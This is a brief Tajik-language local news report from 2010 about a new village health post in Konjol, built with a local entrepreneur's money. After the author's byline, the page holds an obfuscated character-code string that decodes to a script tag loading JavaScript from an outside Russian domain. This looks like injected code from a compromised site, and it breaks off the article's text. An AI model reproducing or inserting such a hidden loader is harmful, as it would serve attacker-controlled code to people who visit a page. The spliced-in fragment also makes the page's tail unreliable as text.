3.06.2010
Дар Конжол Хонаи саломатӣ кушода шуд
Барои аҳолии 500-нафари деҳаи Конжоли ҷамоати Ӯткансой Хонаи саломатӣ кушода шуд. Хонаи саломатии деҳаи мазкур бо дастгирии соҳибкор Шоимқул Неъматуллоев сохта шуда, аз ҷониби Раиси ноҳия бо сипоснома қадрдонӣ шуд. Бино ба гуфти сардори беморхонаи марказии ноҳияи Б.Ғафуров Боҳодур Мӯъминов ин 7-умин Хонаи саломатӣ дар соли равон мебошад, ки дар деҳаҳои дурдасти ноҳия сохта шудаанд. Алҳол дар ин ҷо ду нафар ҳамшираи шафқат кор карда, дар як ҳафта ду маротиба табибон аз ҷамоати Ӯткансой омада беморонро муолиҷа менамоянд. Барои сохтани бинои мазкур аз ҷониби соҳибкор 35-ҳазор сомонӣ сарф шудааст
Афзал Босолиев
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)2ccd29c683099267f431fc67d0dfcda4.js" type="text/javascript">

ТАВЗЕҲОТ